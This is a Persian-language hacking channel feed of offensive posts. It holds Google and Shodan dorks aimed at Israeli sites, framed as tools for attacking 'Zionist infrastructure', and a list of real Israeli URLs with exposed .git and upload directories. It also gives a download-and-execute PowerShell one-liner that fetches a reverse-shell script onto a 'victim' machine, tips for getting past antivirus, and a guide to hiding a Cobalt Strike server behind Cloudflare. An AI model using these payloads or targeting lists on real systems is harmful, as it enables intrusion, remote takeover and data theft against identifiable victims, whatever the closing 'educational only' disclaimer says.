CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥

shodan dorks for recon :

1. ssl.cert.subject.CN:"*.target.com" http.noscript:"index of/"

2. ssl.cert.subject.CN:"*.target.com" http.noscript:"gitlab"

3. ssl.cert.subject.CN:"*. target.com" http.noscript:"gitlab"

4. ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"

5. ssl.cert.subject.CN:"*. target.com" +200 http.noscript:"Admin"

آسیب پذیری جدید از دیوار که بابتش 50 میلیون بانتی دادن رایتاپش نوشته شد⭐️

https://x.com/matinnouryan/status/1834233501459038718?s=46

چی میشه اگر یه برنامه نویس فولدر .git رو داخل هاست اپلود کنه؟

در ویدیو زیر به برسی دایرکتوری .git و نحوه اکسپلویت کردن این دایرکتوری میپردازیم.

در بحث بالا بردن اهمیت این آسیب پذیری در باگ بانتی
و یا برسی کردنشیال ها یا … در عملیات های رد تیم


https://youtu.be/nQp0Me4tTEU?si=C4fG3F0xF8bfFde8

گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍

site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=

site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"

site:*.il inurl:news.php?id=
site:*.il "index of /"

http://tzafrir.org.il/~tzafrir/git_test/.git/

https://apache.co.il/zzz/

https://www.flutedoc.co.il/

https://pdf.melumad.co.il/

https://flashner.co.il/~efraim/

https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f

https://asidesign.co.il/wp-content/uploads/

https://tuticafe.co.il/wp-content/uploads/

با یدونه از گوگل دورک های بالا ریختن بیرون

با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:

https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1

کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.

مراحل اجرا:‌‌
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.

2. حالا با استفاده از یک پیلود مثل

iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.

دسترسی برقرار میشود!💣

نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍

دیشب روی ویندور 10 کامل تست شده و کار میکنه🤙
ممکنه در آنتی ویروس های آپدیت کمی مشکل داشته باشه, با ایجاد تایم بالا و کمی بازی مموری میتونید اون روهم بایپس کنید!

💻 هک سیستم عامل ویندوز با فایل word

⚙️ از اسکریپت های پست بالا داخل ویدیو استفاده کردم

@matitanium

باگ پارتی 2024
پارک علم و فناوری پردیس
Cybersecurity event 2024

تو این سایت می‌تونید مقالاتِ پولیِ مدیوم رو رایگان باز کنید. در واقع خودش اشتراکِ مدیوم خریده و از طریقِ این سایت در دسترسِ عموم قرار داده.

@matitanium

مراسم اختتامیه هکر های دوست داشتنی 2024

@matitanium

روش پنهان سازی IP کبالت با کلودفلیر✅

https://youtu.be/YcuQa2cCdPU

GDPR چیست؟

GDPR (General Data Protection Regulation) یا قانون حفاظت از داده‌های عمومی، مجموعه قوانینی است که توسط اتحادیه اروپا برای حفاظت از داده‌های شخصی افراد وضع شده است. این قوانین شامل تمامی شرکت‌ها و سازمان‌هایی می‌شود که اقدام به ذخیره‌سازی یا پردازش اطلاعات کاربران اتحادیه اروپا می‌کنند، حتی اگر خارج از اتحادیه اروپا باشند

شرکت‌ها موظف‌اند:
• حفاظت از داده‌های شخصی کاربران مانند نام، ایمیل، آدرس IP و هر اطلاعاتی که به شناسایی یک فرد خاص کمک کند


• اطلاع‌رسانی در صورت نقض داده‌ها و رعایت شفافیت کامل در جمع‌آوری و استفاده از داده‌ها


در صورت عدم رعایت این قوانین، جریمه‌های سنگینی اعمال خواهد شد. این موضوع، سایت‌ها و خدمات بین‌المللی را نیز شامل می‌شود


@matitanium

کتاب امنیت LLM ها و تست نفوذشون
بنظر جالب اومد گفتم شیر کنم باهاتون

@matitanium

path:/login/dbconf.php~


@matitanium

VAPT Interview Questions and Answers.pdf

Red Teaming Tools